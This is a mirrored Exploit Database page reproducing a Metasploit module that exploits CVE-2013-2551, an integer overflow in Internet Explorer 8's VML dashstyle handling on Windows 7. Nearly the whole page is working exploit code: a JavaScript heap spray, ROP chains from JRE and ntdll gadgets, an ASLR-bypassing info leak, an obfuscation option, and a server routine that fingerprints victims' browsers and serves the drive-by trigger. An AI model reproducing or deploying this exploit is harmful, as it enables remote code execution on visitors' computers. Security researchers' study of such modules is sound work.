Microsoft Internet Explorer – COALineDashStyleArray Integer Overflow (MS13-009) (Metasploit)

• Exploit Database
• 100 阅读

• 作者： Metasploit
  日期： 2013-06-13
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/26175/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447

  ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn   autopwn_info({ :ua_name=> HttpClients::IE, :ua_minver=> "8.0", :ua_maxver=> "8.0", :javascript => true, :os_name=> OperatingSystems::WINDOWS, :rank => Rank })     def initialize(info={}) super(update_info(info, &apos;Name&apos; => "MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", &apos;Description&apos;=> %q{ This module exploits an integer overflow vulnerability on Internet Explorer. The vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module. This module has been tested successfully on Windows 7 SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target to use an info leak to disclose the ntdll.dll base address is provided. This target requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001). }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Nicolas Joly&apos;, # Vulnerability discovery, PoC and analysis &apos;4B5F5F4B&apos;, # PoC &apos;juan vazquez&apos; # Metasploit module ], &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2013-2551&apos; ], [ &apos;OSVDB&apos;, &apos;91197&apos; ], [ &apos;BID&apos;, &apos;58570&apos; ], [ &apos;MSB&apos;, &apos;MS13-037&apos; ], [ &apos;URL&apos;, &apos;http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php&apos; ], [ &apos;URL&apos;, &apos;http://binvul.com/viewthread.php?tid=311&apos; ] ], &apos;Payload&apos;=> { &apos;Space&apos;=> 948, &apos;DisableNops&apos;=> true, &apos;PrependEncoder&apos; => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, &apos;DefaultOptions&apos;=> { &apos;InitialAutoRunScript&apos; => &apos;migrate -f&apos; }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Automatic&apos;, {} ], [ &apos;IE 8 on Windows 7 SP1 with JRE ROP&apos;, # default { &apos;Rop&apos; => :jre, &apos;Offset&apos; => &apos;0x5f4&apos; } ], # requires: # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation) # * ntdll.dll v6.1.7601.17725 (MS12-001) [ &apos;IE 8 on Windows 7 SP1 with ntdll.dll Info Leak&apos;, { &apos;Rop&apos; => :ntdll, &apos;Offset&apos; => &apos;0x5f4&apos; } ] ], &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => "Mar 06 2013", &apos;DefaultTarget&apos;=> 0))   register_options( [ OptBool.new(&apos;OBFUSCATE&apos;, [false, &apos;Enable JavaScript obfuscation&apos;, false]) ], self.class)   end   def exploit @second_stage_url = rand_text_alpha(10) @leak_param = rand_text_alpha(5) super end   def get_target(agent) #If the user is already specified by the user, we&apos;ll just use that return target if target.name != &apos;Automatic&apos;   nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || &apos;&apos; ie = agent.scan(/MSIE (\d)/).flatten[0] || &apos;&apos;   ie_name = "IE #{ie}"   case nt when &apos;5.1&apos; os_name = &apos;Windows XP SP3&apos; when &apos;6.0&apos; os_name = &apos;Windows Vista&apos; when &apos;6.1&apos; os_name = &apos;Windows 7&apos; end   targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end   return nil end   def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))   # Land the payload at 0x0c0c0c0c # For IE 8 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target[&apos;Offset&apos;]}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } |   js = heaplib(js, {:noobfu => true})   if datastore[&apos;OBFUSCATE&apos;] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end   return js end   def get_ntdll_rop case @ntdll_version when "6.1.7601.17514" stack_pivot = [ @ntdll_base+0x0001578a, # ret # from ntdll @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll @ntdll_base+0x00015789, # xchg eax, esp # ret from ntdll ].pack("V*") ntdll_rop = [ @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory 0x0c0c0c40, # ret to shellcode 0xffffffff, # ProcessHandle 0x0c0c0c34, # ptr to BaseAddress 0x0c0c0c38, # ptr to NumberOfBytesToProtect 0x00000040, # NewAccessProtection 0x0c0c0c3c, # ptr to OldAccessProtection 0x0c0c0c40, # BaseAddress 0x00000400, # NumberOfBytesToProtect 0x41414141# OldAccessProtection ].pack("V*") return stack_pivot + ntdll_rop when "6.1.7601.17725" stack_pivot = [ @ntdll_base+0x0001579a, # ret # from ntdll @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll @ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll ].pack("V*") ntdll_rop = [ @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory 0x0c0c0c40, # ret to shellcode 0xffffffff, # ProcessHandle 0x0c0c0c34, # ptr to BaseAddress 0x0c0c0c38, # ptr to NumberOfBytesToProtect 0x00000040, # NewAccessProtection 0x0c0c0c3c, # ptr to OldAccessProtection 0x0c0c0c40, # BaseAddress 0x00000400, # NumberOfBytesToProtect 0x41414141# OldAccessProtection ].pack("V*") return stack_pivot + ntdll_rop else return "" end end   def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t[&apos;Rop&apos;].nil?   # Both ROP chains generated by mona.py - See corelan.be case t[&apos;Rop&apos;] when :jre print_status("Using JRE ROP") stack_pivot = [ 0x7c348b06, # ret # from msvcr71 0x7c341748, # pop ebx # ret # from msvcr71 0x7c348b05# xchg eax, esp # ret from msvcr71 ].pack("V*") rop_payload = generate_rop_payload(&apos;java&apos;, code, {&apos;pivot&apos;=>stack_pivot}) when :ntdll print_status("Using ntdll ROP") rop_payload = get_ntdll_rop + payload.encoded end   return rop_payload end   def load_exploit_html(my_target, cli) p= get_payload(my_target, cli) js = ie_heap_spray(my_target, p)   js_trigger = %Q| var rect_array = new Array() var a = new Array()   function createRects(){ for(var i=0; i<0x1000; i++){ rect_array[i]= document.createElement("v:shape") rect_array[i].id = "rect" + i.toString() document.body.appendChild(rect_array[i]) } }   function exploit(){   var vml1 = document.getElementById("vml1")   for (var i=0; i<0x1000; i++){ a[i] = document.getElementById("rect" + i.toString())._anchorRect; if (i == 0x800) { vml1.dashstyle = "1 2 3 4" } }   vml1.dashstyle.array.length = 0 - 1; vml1.dashstyle.array.item(6) = 0x0c0c0c0c;   for (var i=0; i<0x1000; i++) { delete a[i]; CollectGarbage(); } location.reload();   } |   create_rects_func = "createRects" exploit_func = "exploit"   if datastore[&apos;OBFUSCATE&apos;] js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) js_trigger.obfuscate create_rects_func = js_trigger.sym("createRects") exploit_func = js_trigger.sym("exploit") end   html = %Q| <html> <head> <script> #{js} </script> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" > </head> <title> </title> <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style> <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" /> <script> #{js_trigger} </script> <body onload="#{create_rects_func}(); #{exploit_func}();"> <v:oval> <v:stroke id="vml1"/> </v:oval> </body> </html> |   return html end   def html_info_leak   js_trigger = %Q| var rect_array = new Array() var a = new Array()   function createRects(){ for(var i=0; i<0x400; i++){ rect_array[i]= document.createElement("v:shape") rect_array[i].id = "rect" + i.toString() document.body.appendChild(rect_array[i]) } }   function exploit(){   var vml1= document.getElementById("vml1")   for (var i=0; i<0x400; i++){ a[i] = document.getElementById("rect" + i.toString())._vgRuntimeStyle; }   for (var i=0; i<0x400; i++){ a[i].rotation; if (i == 0x300) { vml1.dashstyle = "1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44" } }   var length_orig = vml1.dashstyle.array.length; vml1.dashstyle.array.length = 0 - 1;   for (var i=0; i<0x400; i++) { a[i].marginLeft = "a"; marginLeftAddress = vml1.dashstyle.array.item(0x2E+0x16); if (marginLeftAddress > 0) { vml1.dashstyle.array.item(0x2E+0x16) = 0x7ffe0300; var leak = a[i].marginLeft; vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress; vml1.dashstyle.array.length = length_orig; document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 ) return; } }   } |   create_rects_func = "createRects" exploit_func = "exploit"   if datastore[&apos;OBFUSCATE&apos;] js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) js_trigger.obfuscate create_rects_func = js_trigger.sym("createRects") exploit_func = js_trigger.sym("exploit") end   html = %Q| <html> <head> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" > </head> <title> </title> <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style> <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" /> <script> #{js_trigger} </script> <body onload="#{create_rects_func}(); #{exploit_func}();"> <v:oval> <v:stroke id="vml1"/> </v:oval> </body> </html> |   return html   end   def on_request_uri(cli, request) agent = request.headers[&apos;User-Agent&apos;] uri = request.uri print_status("Requesting: #{uri}")   my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end   if my_target[&apos;Rop&apos;] == :ntdll and request.uri !~ /#{@second_stage_url}/ html = html_info_leak html = html.gsub(/^\t\t/, &apos;&apos;) print_status("Sending HTML to info leak...") send_response(cli, html, {&apos;Content-Type&apos;=>&apos;text/html&apos;}) else leak = begin request.uri_parts["QueryString"][@leak_param].to_i rescue 0 end   if leak == 0 html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, &apos;&apos;) print_status("Sending HTML to trigger...") send_response(cli, html, {&apos;Content-Type&apos;=>&apos;text/html&apos;}) return end   vprint_status("ntdll leak: 0x#{leak.to_s(16)}") fingerprint = leak & 0x0000ffff   case fingerprint when 0x70B0 @ntdll_version = "6.1.7601.17514" @ntdll_base = leak - 0x470B0 when 0x7090 @ntdll_version = "6.1.7601.17725" # MS12-001 @ntdll_base = leak - 0x47090 else print_error("ntdll version not detected, sending 404: #{agent}") send_not_found(cli) return end   html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, &apos;&apos;) print_status("Sending HTML to trigger...") send_response(cli, html, {&apos;Content-Type&apos;=>&apos;text/html&apos;})   end   end   end